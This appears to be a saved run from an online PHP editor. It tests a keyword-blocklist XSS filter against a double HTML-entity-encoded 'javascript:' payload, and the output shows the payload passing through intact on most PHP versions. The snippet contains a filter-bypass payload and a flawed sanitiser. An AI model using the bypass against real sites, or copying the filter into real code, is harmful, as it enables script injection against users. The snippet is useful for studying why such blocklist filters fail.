Online PHP editor | output for HPZBc

@ 2016-03-27T15:05:05Z

<?php

function xssfilter($inp){
    $inp = html_entity_decode(urldecode($inp));
    $inp = preg_replace('/!/','',$inp);
    if (preg_match('/script|on|xmlns|data/iu',$inp)){
        while(preg_match('/script|on|xmlns|data/iu',$inp)){
            $inp = preg_replace('/(script)|(on)|(xmlns)|(data)/iu','NO!',$inp);
        }
    }
    return $inp;
}

echo xssfilter("&#x26;&#x23;&#x78;&#x36;&#x41;&#x3B;&#x26;&#x23;&#x78;&#x36;&#x31;&#x3B;&#x26;&#x23;&#x78;&#x37;&#x36;&#x3B;&#x26;&#x23;&#x78;&#x36;&#x31;&#x3B;&#x26;&#x23;&#x78;&#x37;&#x33;&#x3B;&#x26;&#x23;&#x78;&#x36;&#x33;&#x3B;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3B;&#x26;&#x23;&#x78;&#x36;&#x39;&#x3B;&#x26;&#x23;&#x78;&#x37;&#x30;&#x3B;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3B;: alert('XSS');");

Output for 5.5.0 - 5.5.35, 5.6.0 - 5.6.28, 7.0.0 - 7.0.20, 7.1.0 - 7.1.25, 7.2.0 - 7.2.33, 7.3.0 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.4, 8.3.6: javascript: alert('XSS');
Output for 8.3.5: Warning: PHP Startup: Unable to load dynamic library 'sodium.so' (tried: /usr/lib/php/8.3.5/modules/sodium.so (libsodium.so.23: cannot open shared object file: No such file or directory), /usr/lib/php/8.3.5/modules/sodium.so.so (/usr/lib/php/8.3.5/modules/sodium.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 javascript: alert('XSS');

preferences:dark modelive preview